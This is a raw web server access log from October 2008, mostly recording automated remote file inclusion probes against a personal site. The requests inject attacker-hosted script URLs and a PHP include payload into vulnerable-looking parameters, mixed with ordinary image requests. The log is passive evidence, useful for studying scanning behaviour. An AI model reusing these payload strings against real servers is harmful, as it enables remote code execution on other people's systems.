88.84.146.23 - - [26/Oct/2008:09:39:07 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:08 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:39:08 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:39:10 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:39:10 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:39:11 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:39:11 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:39:13 -0700] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:39:14 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:39:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-050_3.jpg HTTP/1.1" 200 448201 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:18 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:39:31 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:37 -0700] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:39:37 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:39:38 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:43 -0700] "GET /logs/access_080918.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.142.223.158 - - [26/Oct/2008:09:39:44 -0700] "GET /?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 8097 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:45 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:39:45 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:39:49 -0700] "GET /logs/index1.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:39:49 -0700] "GET /logs/access_081007.log/includes/useragent.inc.php?prefix=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:39:49 -0700] "GET /includes/useragent.inc.php?prefix=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:39:49 -0700] "GET /index1.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:39:49 -0700] "GET /logs/includes/useragent.inc.php?prefix=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:09:39:50 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.186.124.208 - - [26/Oct/2008:09:39:51 -0700] "GET /logs/access_080828.log/errors.php?error=http://timjardim.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.186.124.208 - - [26/Oct/2008:09:39:51 -0700] "GET /errors.php?error=http://timjardim.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.186.124.208 - - [26/Oct/2008:09:39:52 -0700] "GET /logs/errors.php?error=http://timjardim.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:39:56 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:40:00 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:40:04 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:40:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-036_2.jpg HTTP/1.1" 200 498314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:40:11 -0700] "GET /logs/homepage.php?sel=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:40:11 -0700] "GET /homepage.php?sel=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:40:27 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.78.225.22 - - [26/Oct/2008:09:40:32 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 200 94847 "-" "libwww-perl/5.63" "www.dmulk.com"
218.37.27.142 - - [26/Oct/2008:09:40:39 -0700] "GET /logs/access_081007.log/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.sdpescadoresteruel.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.37.27.142 - - [26/Oct/2008:09:40:39 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.sdpescadoresteruel.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.37.27.142 - - [26/Oct/2008:09:40:40 -0700] "GET /logs/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.sdpescadoresteruel.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:40:40 -0700] "GET /logs/access_081007.log/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.vvtube.com.ua/images/id.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:40:40 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.vvtube.com.ua/images/id.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.37.27.142 - - [26/Oct/2008:09:40:41 -0700] "GET /logs/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.vvtube.com.ua/images/id.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:40:42 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:40:46 -0700] "GET /logs/access_080819.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:40:48 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:40:54 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.126.46.141 - - [26/Oct/2008:09:40:55 -0700] "GET /logs/access_081015.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:40:56 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://csinfo.pl/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:41:01 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-027_3.jpg HTTP/1.1" 200 457302 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:41:19 -0700] "GET /logs/homepage.php?sel=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:41:19 -0700] "GET /homepage.php?sel=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:41:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:41:20 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:41:20 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:41:21 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:41:27 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:41:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-078.jpg HTTP/1.1" 200 354510 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
99.162.124.241 - - [26/Oct/2008:09:41:34 -0700] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:41:39 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:41:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-150.jpg HTTP/1.1" 200 256571 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:41:42 -0700] "GET /errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:41:42 -0700] "GET /logs/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:41:42 -0700] "GET /logs/access_080908.log%20/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:09:41:43 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:09:41:43 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:41:45 -0700] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:41:45 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:41:46 -0700] "GET /logs/access_080819.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:41:46 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:41:47 -0700] "GET /logs/access_080307.log/index1.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:41:47 -0700] "GET /errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:41:47 -0700] "GET /logs/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:41:47 -0700] "GET /index1.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:41:47 -0700] "GET /logs/index1.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:41:48 -0700] "GET /logs/access_080908.log%20/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:41:57 -0700] "GET /logs/access_080507.log/index1.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:00 -0700] "GET /logs/access_080908.log%20/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:42:00 -0700] "GET /errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:42:01 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:42:01 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:42:01 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:01 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:04 -0700] "GET /logs/access_080820.log/homepage.php?sel=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:04 -0700] "GET /homepage.php?sel=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:08 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0135.jpg HTTP/1.1" 200 11081 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-021_2.jpg HTTP/1.1" 200 538232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:12 -0700] "GET /logs/access_080609.log/port.php?content=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:12 -0700] "GET /port.php?content=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:42:15 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/017-2.jpg HTTP/1.1" 200 265419 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:42:16 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:16 -0700] "GET /logs/port.php?content=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:16 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:42:16 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:42:17 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:19 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:42:19 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:42:25 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:27 -0700] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:42:28 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://business-buket.ru/kx.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:29 -0700] "GET /logs/access_080601.log//samPHPweb/playing.php//common/db.php?commonpath=http://www2.osrd.go.th/webboard/avatars/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:42:32 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.158.0.5 - - [26/Oct/2008:09:42:32 -0700] "GET /logs/access_080115.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:36 -0700] "GET /logs/access_080424.log/index2.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:36 -0700] "GET /index2.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:37 -0700] "GET /logs/index2.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:37 -0700] "GET /logs/access_080526.log/index2.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:37 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [26/Oct/2008:09:42:43 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:43 -0700] "GET /logs/home.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:44 -0700] "GET /home.php?x=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:09:42:45 -0700] "GET /logs/access_080428.log/homepage.php?sel=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:48 -0700] "GET /logs/access_080529.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://asafsagiv.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:48 -0700] "GET /logs/access_080508.log/port.php?content=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:42:50 -0700] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:42:51 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://business-buket.ru/kx.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
